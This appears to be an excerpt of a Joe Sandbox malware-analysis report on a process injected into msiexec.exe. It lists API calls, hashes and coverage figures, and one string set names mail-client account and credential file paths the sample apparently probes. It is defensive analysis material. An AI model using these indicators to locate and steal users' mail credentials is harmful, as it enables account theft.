                                                              • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,5EFC4D8B,00000100,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 254C89FB
                                                              • __freea.LIBCMT ref: 254C8A08
                                                                • Part of subcall function 254C56D0: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 254C5702
                                                              • __freea.LIBCMT ref: 254C8A11
                                                              • __freea.LIBCMT ref: 254C8A36
                                                              Memory Dump Source
                                                              • Source File: 00000009.00000002.2971360109.00000000254C1000.00000040.00001000.00020000.00000000.sdmp, Offset: 254C0000, based on PE: true
                                                              • Associated: 00000009.00000002.2971296397.00000000254C0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000009.00000002.2971360109.00000000254D6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_9_2_254c0000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: ByteCharMultiWide__freea$AllocateHeap
                                                              • String ID:
                                                              • API String ID: 1414292761-0
                                                              • Opcode ID: e0e8f41a67bfb64f32c3544392b22d97be5347797e81652401961bb335b8c2db
                                                              • Instruction ID: 2e83a4a517681f32923bada0a991f73efc0bc57dc0e904c3f4a194fbe4cf60d1
                                                              • Opcode Fuzzy Hash: e0e8f41a67bfb64f32c3544392b22d97be5347797e81652401961bb335b8c2db
                                                              • Instruction Fuzzy Hash: D251E67B710216ABDB15CE64CC40EABB7A9FFD0665F2146E8FD05D6240EB35FC508660

                                                              Control-flow Graph

                                                              APIs
                                                              • _strlen.LIBCMT ref: 254C1607
                                                              • _strcat.LIBCMT ref: 254C161D
                                                              • lstrlenW.KERNEL32(?,00000000,00000000,00000000,?,?,?,?,254C190E,?,?,00000000,?,00000000), ref: 254C1643
                                                              • lstrcatW.KERNEL32(?,?,?,?,?,?,254C190E,?,?,00000000,?,00000000,?,?,?,00000104), ref: 254C165A
                                                              • lstrlenW.KERNEL32(?,?,?,?,?,254C190E,?,?,00000000,?,00000000,?,?,?,00000104,?), ref: 254C1661
                                                              • lstrcatW.KERNEL32(00001008,?,?,?,?,?,254C190E,?,?,00000000,?,00000000,?,?,?,00000104), ref: 254C1686
                                                              Memory Dump Source
                                                              • Source File: 00000009.00000002.2971360109.00000000254C1000.00000040.00001000.00020000.00000000.sdmp, Offset: 254C0000, based on PE: true
                                                              • Associated: 00000009.00000002.2971296397.00000000254C0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000009.00000002.2971360109.00000000254D6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_9_2_254c0000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: lstrcatlstrlen$_strcat_strlen
                                                              • String ID:
                                                              • API String ID: 1922816806-0
                                                              • Opcode ID: 8ba1035ec8c58064af3d7bbb6512567751a8e90212b863b27c318181364433b3
                                                              • Instruction ID: c2a55882fd37ec02f8e06e6bf936c95d8a050d1ef041d3136e54b0ef30d82fb9
                                                              • Opcode Fuzzy Hash: 8ba1035ec8c58064af3d7bbb6512567751a8e90212b863b27c318181364433b3
                                                              • Instruction Fuzzy Hash: 8C21CB36A00204ABC704DF54DC80EEEB7B8EFD8B16F24409EE504AB141DF74B5418769
                                                              APIs
                                                              • lstrcatW.KERNEL32(?,?,?,?,?,00000000), ref: 254C1038
                                                              • lstrlenW.KERNEL32(?,?,?,?,00000000), ref: 254C104B
                                                              • lstrlenW.KERNEL32(?,?,?,?,00000000), ref: 254C1061
                                                              • lstrlenW.KERNEL32(?,?,?,?,?,00000000), ref: 254C1075
                                                              • GetFileAttributesW.KERNEL32(?,?,?,00000000), ref: 254C1090
                                                              • lstrlenW.KERNEL32(?,?,?,00000000), ref: 254C10B8
                                                              Memory Dump Source
                                                              • Source File: 00000009.00000002.2971360109.00000000254C1000.00000040.00001000.00020000.00000000.sdmp, Offset: 254C0000, based on PE: true
                                                              • Associated: 00000009.00000002.2971296397.00000000254C0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000009.00000002.2971360109.00000000254D6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_9_2_254c0000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: lstrlen$AttributesFilelstrcat
                                                              • String ID:
                                                              • API String ID: 3594823470-0
                                                              • Opcode ID: 75589600eaa2a0c572ea33a7bf8677ebca076cddd732ab9e4ae449a3c17621c7
                                                              • Instruction ID: 95204dcdc802cf8fd3edc40dedb57cf6e5c4fe62a78a3c460b374e154375e460
                                                              • Opcode Fuzzy Hash: 75589600eaa2a0c572ea33a7bf8677ebca076cddd732ab9e4ae449a3c17621c7
                                                              • Instruction Fuzzy Hash: 5221A1399003189BCF14DB65DC88EDFB779EFD421AF1042DAE959932A1DE30AE85CB40
                                                              APIs
                                                              • GetLastError.KERNEL32(?,?,254C3518,254C23F1,254C1F17), ref: 254C3864
                                                              • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 254C3872
                                                              • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 254C388B
                                                              • SetLastError.KERNEL32(00000000,?,254C3518,254C23F1,254C1F17), ref: 254C38DD
                                                              Memory Dump Source
                                                              • Source File: 00000009.00000002.2971360109.00000000254C1000.00000040.00001000.00020000.00000000.sdmp, Offset: 254C0000, based on PE: true
                                                              • Associated: 00000009.00000002.2971296397.00000000254C0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000009.00000002.2971360109.00000000254D6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_9_2_254c0000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: ErrorLastValue___vcrt_
                                                              • String ID:
                                                              • API String ID: 3852720340-0
                                                              • Opcode ID: 57efad5ce2d6412d6694d61371d56341bf7e29c26e0123fed08e47149c556546
                                                              • Instruction ID: 7392bfd0318412437872c110206b7ad6af5358e25b009aa816d98eec3ba745c1
                                                              • Opcode Fuzzy Hash: 57efad5ce2d6412d6694d61371d56341bf7e29c26e0123fed08e47149c556546
                                                              • Instruction Fuzzy Hash: A801453E73AB025DE609D679AC88E46F6E5EBD1A3F72002FDE010441D1EE157C014228
                                                              APIs
                                                              • GetLastError.KERNEL32(?,?,254C6C6C), ref: 254C5AFA
                                                              • _free.LIBCMT ref: 254C5B2D
                                                              • _free.LIBCMT ref: 254C5B55
                                                              • SetLastError.KERNEL32(00000000,?,?,254C6C6C), ref: 254C5B62
                                                              • SetLastError.KERNEL32(00000000,?,?,254C6C6C), ref: 254C5B6E
                                                              • _abort.LIBCMT ref: 254C5B74
                                                              Memory Dump Source
                                                              • Source File: 00000009.00000002.2971360109.00000000254C1000.00000040.00001000.00020000.00000000.sdmp, Offset: 254C0000, based on PE: true
                                                              • Associated: 00000009.00000002.2971296397.00000000254C0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000009.00000002.2971360109.00000000254D6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_9_2_254c0000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: ErrorLast$_free$_abort
                                                              • String ID:
                                                              • API String ID: 3160817290-0
                                                              • Opcode ID: 70870b51a365c68ae5b5d0a9f9eb6124be169f3058513e0629f37c2990f54b34
                                                              • Instruction ID: 670da63d5cc4035a0fff2b849d6a82bdd4dc45d571b03eb7163beba4b3f44b49
                                                              • Opcode Fuzzy Hash: 70870b51a365c68ae5b5d0a9f9eb6124be169f3058513e0629f37c2990f54b34
                                                              • Instruction Fuzzy Hash: D0F02D3E61550066C30AA334AC4CEDFDE169FD3D73F3500E8F91496281FE24AC034120
                                                              APIs
                                                              • GetModuleFileNameA.KERNEL32(00000000,C:\Windows\System32\msiexec.exe,00000104), ref: 254C4C1D
                                                              • _free.LIBCMT ref: 254C4CE8
                                                              • _free.LIBCMT ref: 254C4CF2
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000009.00000002.2971360109.00000000254C1000.00000040.00001000.00020000.00000000.sdmp, Offset: 254C0000, based on PE: true
                                                              • Associated: 00000009.00000002.2971296397.00000000254C0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000009.00000002.2971360109.00000000254D6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_9_2_254c0000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: _free$FileModuleName
                                                              • String ID: C:\Windows\System32\msiexec.exe$/Z
                                                              • API String ID: 2506810119-990738925
                                                              • Opcode ID: 5d0b5b2d0cb3b9c89ce461ddd30e85f14c746f1482c02b09d5dd0b10abb2abbc
                                                              • Instruction ID: 73a9fc1c20ddb3c025897c7941f1e4bcec1caa9e18d0f96eeef81e354944240d
                                                              • Opcode Fuzzy Hash: 5d0b5b2d0cb3b9c89ce461ddd30e85f14c746f1482c02b09d5dd0b10abb2abbc
                                                              • Instruction Fuzzy Hash: B331B379A11308AFD711CB99C980D8EFBF8EBC4716F5140EAE90597310DA70AE41CB50
                                                              APIs
                                                                • Part of subcall function 254C1E89: lstrlenW.KERNEL32(?,?,?,?,?,254C10DF,?,?,?,00000000), ref: 254C1E9A
                                                                • Part of subcall function 254C1E89: lstrcatW.KERNEL32(?,?,?,254C10DF,?,?,?,00000000), ref: 254C1EAC
                                                                • Part of subcall function 254C1E89: lstrlenW.KERNEL32(?,?,254C10DF,?,?,?,00000000), ref: 254C1EB3
                                                                • Part of subcall function 254C1E89: lstrlenW.KERNEL32(?,?,254C10DF,?,?,?,00000000), ref: 254C1EC8
                                                                • Part of subcall function 254C1E89: lstrcatW.KERNEL32(?,254C10DF,?,254C10DF,?,?,?,00000000), ref: 254C1ED3
                                                              • GetFileAttributesW.KERNEL32(?,?,?,?), ref: 254C122A
                                                                • Part of subcall function 254C173A: _strlen.LIBCMT ref: 254C1855
                                                                • Part of subcall function 254C173A: _strlen.LIBCMT ref: 254C1869
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000009.00000002.2971360109.00000000254C1000.00000040.00001000.00020000.00000000.sdmp, Offset: 254C0000, based on PE: true
                                                              • Associated: 00000009.00000002.2971296397.00000000254C0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000009.00000002.2971360109.00000000254D6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_9_2_254c0000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: lstrlen$_strlenlstrcat$AttributesFile
                                                              • String ID: \Accounts\Account.rec0$\Data\AccCfg\Accounts.tdat$\Mail\$\Storage\
                                                              • API String ID: 4036392271-1520055953
                                                              • Opcode ID: 81022655127535c29fbdf698db780a10633e8962ab581f40585dc9b5b8fe679d
                                                              • Instruction ID: cac7d27aef00d18440eb9e0affd8f1cf73dbc67483c3a0df7741db91a1c40424
                                                              • Opcode Fuzzy Hash: 81022655127535c29fbdf698db780a10633e8962ab581f40585dc9b5b8fe679d
                                                              • Instruction Fuzzy Hash: 2321B87EA102046AE710D794DC91FEEB339EFD0B15F101555F604E71D4E6B16D418758
                                                              APIs
                                                              • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,254C4AEA,?,?,254C4A8A,?,254D2238,0000000C,254C4BBD,00000000,00000000), ref: 254C4B59
                                                              • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 254C4B6C
                                                              • FreeLibrary.KERNEL32(00000000,?,?,?,254C4AEA,?,?,254C4A8A,?,254D2238,0000000C,254C4BBD,00000000,00000000,?,254C2082), ref: 254C4B8F
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000009.00000002.2971360109.00000000254C1000.00000040.00001000.00020000.00000000.sdmp, Offset: 254C0000, based on PE: true
                                                              • Associated: 00000009.00000002.2971296397.00000000254C0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000009.00000002.2971360109.00000000254D6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_9_2_254c0000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: AddressFreeHandleLibraryModuleProc
                                                              • String ID: CorExitProcess$mscoree.dll
                                                              • API String ID: 4061214504-1276376045
                                                              • Opcode ID: 2626be016af06bec2de653f56a4c8d09da260380f6af82d45412a6c9acd5d933
                                                              • Instruction ID: cd6702d08edfacfdb858f45ba8343ee72420ac6d081c9b92910ad9a70e70ab9d
                                                              • Opcode Fuzzy Hash: 2626be016af06bec2de653f56a4c8d09da260380f6af82d45412a6c9acd5d933
                                                              • Instruction Fuzzy Hash: 08F08C35914108BBCB059F95C908FAEFFB9EF84667F5001E8E90AA2240EF35AD41CA90
                                                              APIs
                                                              • GetEnvironmentStringsW.KERNEL32 ref: 254C715C
                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 254C717F
                                                                • Part of subcall function 254C56D0: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 254C5702
                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 254C71A5
                                                              • _free.LIBCMT ref: 254C71B8
                                                              • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 254C71C7
                                                              Memory Dump Source
                                                              • Source File: 00000009.00000002.2971360109.00000000254C1000.00000040.00001000.00020000.00000000.sdmp, Offset: 254C0000, based on PE: true
                                                              • Associated: 00000009.00000002.2971296397.00000000254C0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000009.00000002.2971360109.00000000254D6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_9_2_254c0000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                                              • String ID:
                                                              • API String ID: 336800556-0
                                                              • Opcode ID: 2b452bd515f1f8344189c6c663bc4ff0ffdef9c4e7e5f065cb944252446571f7
                                                              • Instruction ID: 21a4d82d9b8abc7714f412375f5f4f39dcb9f09407bad8406d40faed9698af30
                                                              • Opcode Fuzzy Hash: 2b452bd515f1f8344189c6c663bc4ff0ffdef9c4e7e5f065cb944252446571f7
                                                              • Instruction Fuzzy Hash: 0101847A6162557F23115ABB4C88D7BEE6DEFC2DA672401EDBD06C7300EE64AC0281B0
                                                              APIs
                                                              • GetLastError.KERNEL32(00000000,?,00000000,254C636D,254C5713,00000000,?,254C2249,?,?,254C1D66,00000000,?,?,00000000), ref: 254C5B7F
                                                              • _free.LIBCMT ref: 254C5BB4
                                                              • _free.LIBCMT ref: 254C5BDB
                                                              • SetLastError.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 254C5BE8
                                                              • SetLastError.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 254C5BF1
                                                              Memory Dump Source
                                                              • Source File: 00000009.00000002.2971360109.00000000254C1000.00000040.00001000.00020000.00000000.sdmp, Offset: 254C0000, based on PE: true
                                                              • Associated: 00000009.00000002.2971296397.00000000254C0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000009.00000002.2971360109.00000000254D6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_9_2_254c0000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: ErrorLast$_free
                                                              • String ID:
                                                              • API String ID: 3170660625-0
                                                              • Opcode ID: 4002478a318725de553f660dc1b58a8ad25d3387710fb2170ecfc6fc2bd1caa8
                                                              • Instruction ID: c766074d179276955f0c28159c13a2ec102caac206eb6f585934626bd28007d9
                                                              • Opcode Fuzzy Hash: 4002478a318725de553f660dc1b58a8ad25d3387710fb2170ecfc6fc2bd1caa8
                                                              • Instruction Fuzzy Hash: 75012D3E215601A7830696399C8CDCFEE6AABD397776101ECF81596242FE64FD024160
                                                              APIs
                                                              • lstrlenW.KERNEL32(?,?,?,?,?,254C10DF,?,?,?,00000000), ref: 254C1E9A
                                                              • lstrcatW.KERNEL32(?,?,?,254C10DF,?,?,?,00000000), ref: 254C1EAC
                                                              • lstrlenW.KERNEL32(?,?,254C10DF,?,?,?,00000000), ref: 254C1EB3
                                                              • lstrlenW.KERNEL32(?,?,254C10DF,?,?,?,00000000), ref: 254C1EC8
                                                              • lstrcatW.KERNEL32(?,254C10DF,?,254C10DF,?,?,?,00000000), ref: 254C1ED3
                                                              Memory Dump Source
                                                              • Source File: 00000009.00000002.2971360109.00000000254C1000.00000040.00001000.00020000.00000000.sdmp, Offset: 254C0000, based on PE: true
                                                              • Associated: 00000009.00000002.2971296397.00000000254C0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000009.00000002.2971360109.00000000254D6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_9_2_254c0000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: lstrlen$lstrcat
                                                              • String ID:
                                                              • API String ID: 493641738-0
                                                              • Opcode ID: f188dfe5f1968dd4f15a860780532ff75ee9a00b1fda9ed8628425bef340bfc9
                                                              • Instruction ID: ead31047f828b8402aebdaecbe6b1a42af1b05ff488922bd7e4b5cc50c1b460f
                                                              • Opcode Fuzzy Hash: f188dfe5f1968dd4f15a860780532ff75ee9a00b1fda9ed8628425bef340bfc9
                                                              • Instruction Fuzzy Hash: 50F0823A1142107AD725772AAC85EBFFB7CFFC6A66F54005DFA08831909F587C4292B5
                                                              APIs
                                                              • _free.LIBCMT ref: 254C91D0
                                                                • Part of subcall function 254C571E: HeapFree.KERNEL32(00000000,00000000,?,254C924F,?,00000000,?,00000000,?,254C9276,?,00000007,?,?,254C7E5A,?), ref: 254C5734
                                                                • Part of subcall function 254C571E: GetLastError.KERNEL32(?,?,254C924F,?,00000000,?,00000000,?,254C9276,?,00000007,?,?,254C7E5A,?,?), ref: 254C5746
                                                              • _free.LIBCMT ref: 254C91E2
                                                              • _free.LIBCMT ref: 254C91F4
                                                              • _free.LIBCMT ref: 254C9206
                                                              • _free.LIBCMT ref: 254C9218
                                                              Memory Dump Source
                                                              • Source File: 00000009.00000002.2971360109.00000000254C1000.00000040.00001000.00020000.00000000.sdmp, Offset: 254C0000, based on PE: true
                                                              • Associated: 00000009.00000002.2971296397.00000000254C0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000009.00000002.2971360109.00000000254D6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_9_2_254c0000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: _free$ErrorFreeHeapLast
                                                              • String ID:
                                                              • API String ID: 776569668-0
                                                              • Opcode ID: 44be41b827c418fbb3abbfb8f1c44f3ce0221fa74589567fe1477c48ebe18fe3
                                                              • Instruction ID: 612491026fb0b0b909903965272e733ff7f0846617ed01b4de156ed84c33e554
                                                              • Opcode Fuzzy Hash: 44be41b827c418fbb3abbfb8f1c44f3ce0221fa74589567fe1477c48ebe18fe3
                                                              • Instruction Fuzzy Hash: 93F0627972A640A78658EB98D5C5D4BFBE9FB90726B6048C9F94AD7600CF34FCC08A50
                                                              APIs
                                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,00000100,00000020,00000000,00000000,5EFC4D8B,00000100,254C6FFD,00000000,?,00000020,00000100,?,5EFC4D8B,00000000), ref: 254C8731
                                                              • MultiByteToWideChar.KERNEL32(?,?,?,?,00000000,?), ref: 254C87BA
                                                              • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 254C87CC
                                                              • __freea.LIBCMT ref: 254C87D5
                                                                • Part of subcall function 254C56D0: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 254C5702
                                                              Memory Dump Source
                                                              • Source File: 00000009.00000002.2971360109.00000000254C1000.00000040.00001000.00020000.00000000.sdmp, Offset: 254C0000, based on PE: true
                                                              • Associated: 00000009.00000002.2971296397.00000000254C0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000009.00000002.2971360109.00000000254D6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_9_2_254c0000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
                                                              • String ID:
                                                              • API String ID: 2652629310-0
                                                              • Opcode ID: 432f9ff1e94d0aa2bcf0a5c06d6d4393a75785a50aa401850473cee3e4cc113a
                                                              • Instruction ID: 8f33b260b640c2cef6e371faae6be995af46271ec86a6fdfe4bc7079120df103
                                                              • Opcode Fuzzy Hash: 432f9ff1e94d0aa2bcf0a5c06d6d4393a75785a50aa401850473cee3e4cc113a
                                                              • Instruction Fuzzy Hash: 2D31C336A1121AABDF15CF64CC80DAFBBA5EF80721F1101A9ED05E7250EB35ED51CB90
                                                              APIs
                                                              • GetModuleHandleA.KERNEL32(254CC7DD), ref: 254CC7E6
                                                              • GetModuleHandleA.KERNEL32(?,254CC7DD), ref: 254CC838
                                                              • GetProcAddress.KERNEL32(00000000,00000000), ref: 254CC860
                                                                • Part of subcall function 254CC803: GetProcAddress.KERNEL32(00000000,254CC7F4), ref: 254CC804
                                                              Memory Dump Source
                                                              • Source File: 00000009.00000002.2971360109.00000000254C1000.00000040.00001000.00020000.00000000.sdmp, Offset: 254C0000, based on PE: true
                                                              • Associated: 00000009.00000002.2971296397.00000000254C0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000009.00000002.2971360109.00000000254D6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_9_2_254c0000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: AddressHandleModuleProc
                                                              • String ID:
                                                              • API String ID: 1646373207-0
                                                              • Opcode ID: 18a205e926d3f8c1bd8ceb8f3c836a0ea39c7540959748e6d39d93322aab4e9f
                                                              • Instruction ID: e3e7614a5e1b4fb698c3ee92bc311eb7848a86eb26c3658595c82d1946b586bd
                                                              • Opcode Fuzzy Hash: 18a205e926d3f8c1bd8ceb8f3c836a0ea39c7540959748e6d39d93322aab4e9f
                                                              • Instruction Fuzzy Hash: 4D01DB3864924178AA11D6744C01DBBFFD8ABE7963B201BDAE271C62B3D950A706C3F5
                                                              APIs
                                                              • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,254C1D66,00000000,00000000,?,254C5C88,254C1D66,00000000,00000000,00000000,?,254C5E85,00000006,FlsSetValue), ref: 254C5D13
                                                              • GetLastError.KERNEL32(?,254C5C88,254C1D66,00000000,00000000,00000000,?,254C5E85,00000006,FlsSetValue,254CE190,FlsSetValue,00000000,00000364,?,254C5BC8), ref: 254C5D1F
                                                              • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,254C5C88,254C1D66,00000000,00000000,00000000,?,254C5E85,00000006,FlsSetValue,254CE190,FlsSetValue,00000000), ref: 254C5D2D
                                                              Memory Dump Source
                                                              • Source File: 00000009.00000002.2971360109.00000000254C1000.00000040.00001000.00020000.00000000.sdmp, Offset: 254C0000, based on PE: true
                                                              • Associated: 00000009.00000002.2971296397.00000000254C0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000009.00000002.2971360109.00000000254D6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_9_2_254c0000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: LibraryLoad$ErrorLast
                                                              • String ID:
                                                              • API String ID: 3177248105-0
                                                              • Opcode ID: 01df389ce69664f52c1e5e4a14e24492802acd313275fbd0f2119d97fd3f25f4
                                                              • Instruction ID: b1ffec2e3f4d66600430bd191ec3f7f1d9d4a5fc22e26ca721f27082ee4b0808
                                                              • Opcode Fuzzy Hash: 01df389ce69664f52c1e5e4a14e24492802acd313275fbd0f2119d97fd3f25f4
                                                              • Instruction Fuzzy Hash: A401F0396253226BC3154A699C4CE8AF798BFC56B77604660F50AD7240DF24EC01C6D0
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000009.00000002.2971360109.00000000254C1000.00000040.00001000.00020000.00000000.sdmp, Offset: 254C0000, based on PE: true
                                                              • Associated: 00000009.00000002.2971296397.00000000254C0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000009.00000002.2971360109.00000000254D6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_9_2_254c0000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: _strlen
                                                              • String ID: : $Se.
                                                              • API String ID: 4218353326-4089948878
                                                              • Opcode ID: a70abbbd33418fa47f4ed48ac4096c545584c77cf093be3414735b4e2c88b945
                                                              • Instruction ID: 56a3672f8023cb2b715d65bb896697ea2bb76cacbf4d39215d1e4b29f171eb51
                                                              • Opcode Fuzzy Hash: a70abbbd33418fa47f4ed48ac4096c545584c77cf093be3414735b4e2c88b945
                                                              • Instruction Fuzzy Hash: 30110A79A00248AECB10CFA8D840BDDFBFCEF69605F6050DAE545E7212E6706B02C765
                                                              APIs
                                                              • __CxxThrowException@8.LIBVCRUNTIME ref: 254C2903
                                                                • Part of subcall function 254C35D2: RaiseException.KERNEL32(?,?,?,254C2925,00000000,00000000,00000000,?,?,?,?,?,254C2925,?,254D21B8), ref: 254C3632
                                                              • __CxxThrowException@8.LIBVCRUNTIME ref: 254C2920
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000009.00000002.2971360109.00000000254C1000.00000040.00001000.00020000.00000000.sdmp, Offset: 254C0000, based on PE: true
                                                              • Associated: 00000009.00000002.2971296397.00000000254C0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000009.00000002.2971360109.00000000254D6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_9_2_254c0000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: Exception@8Throw$ExceptionRaise
                                                              • String ID: Unknown exception
                                                              • API String ID: 3476068407-410509341
                                                              • Opcode ID: 3817fccf96ecfb0600da9d1636e88bbb3c1c3549ad5e33faad866e694da3395a
                                                              • Instruction ID: 3a59ba6d4be92112d7750c4a0b5ba6bc414798118bd6c33933233281e0e14317
                                                              • Opcode Fuzzy Hash: 3817fccf96ecfb0600da9d1636e88bbb3c1c3549ad5e33faad866e694da3395a
                                                              • Instruction Fuzzy Hash: 02F0F43CA0C20C778B04E6A4EC4495EF36C6B90E53BA042F4EE9696190EFB0FE168590
                                                              APIs
                                                              • GetOEMCP.KERNEL32(00000000,?,?,254C6C7C,?), ref: 254C6A1E
                                                              • GetACP.KERNEL32(00000000,?,?,254C6C7C,?), ref: 254C6A35
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000009.00000002.2971360109.00000000254C1000.00000040.00001000.00020000.00000000.sdmp, Offset: 254C0000, based on PE: true
                                                              • Associated: 00000009.00000002.2971296397.00000000254C0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000009.00000002.2971360109.00000000254D6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_9_2_254c0000_msiexec.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: |lL%
                                                              • API String ID: 0-1453860402
                                                              • Opcode ID: d10f59d12dcb747be844613d66cc9c255b3aeeecf8ede964815b997369bad7fa
                                                              • Instruction ID: ee70d8d19d0d9347cf7c9b0c67ef40762a06b73d24129a7448e01fbe2d565051
                                                              • Opcode Fuzzy Hash: d10f59d12dcb747be844613d66cc9c255b3aeeecf8ede964815b997369bad7fa
                                                              • Instruction Fuzzy Hash: A8F08C744241088BD704CB6CC448FACF7B1FB8133AF2083D8E4288A2D5DF76AD468B40

                                                              Execution Graph

                                                              Execution Coverage:5.6%
                                                              Dynamic/Decrypted Code Coverage:0%
                                                              Signature Coverage:1.3%
                                                              Total number of Nodes:2000
                                                              Total number of Limit Nodes:74
